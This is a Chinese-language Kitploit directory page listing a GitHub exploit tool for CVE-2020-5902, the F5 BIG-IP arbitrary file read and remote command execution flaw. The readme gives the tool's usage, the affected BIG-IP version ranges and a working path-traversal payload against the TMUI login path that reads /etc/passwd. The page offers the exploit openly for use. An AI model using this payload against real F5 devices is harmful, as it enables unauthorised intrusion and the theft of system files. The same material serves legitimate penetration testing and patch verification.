Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-5902 — F5 BIG-IP 任意文件读取+远程命令执行RCE | Kitploit
工具/GitHubGitHub/zhzyker/cve-2020-5902
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubzhzyker/cve-2020-5902

CVE-2020-5902

F5 BIG-IP 任意文件读取+远程命令执行RCE

查看仓库
1386年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Readme

F5 BIG-IP 任意文件读取+远程命令执行RCE

root@kitploit:~
+-------------------------------------------------------------+
+ DES: by zhzyker as https://github.com/zhzyker/exphub        +
+      CVE-2020-5902 F5 BIG-IP Read File + RCE                +
+-------------------------------------------------------------+
+ USE: python3 <filename> <url>                               +
+ EXP: python3 cve-2020-5902_file.py https://1.1.1.1:8443     +
+ VER: BIG-IP 15.x: 15.1.0/15.0.0                             +
+      BIG-IP 14.x: 14.1.0 ~ 14.1.2                           +
+      BIG-IP 13.x: 13.1.0 ~ 13.1.3                           +
+      BIG-IP 12.x: 12.1.0 ~ 12.1.5                           +
+      BIG-IP 11.x: 11.6.1 ~ 11.6.5                           +
+-------------------------------------------------------------+

Payload

Read file

root@kitploit:~
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Read File

images images

下载工具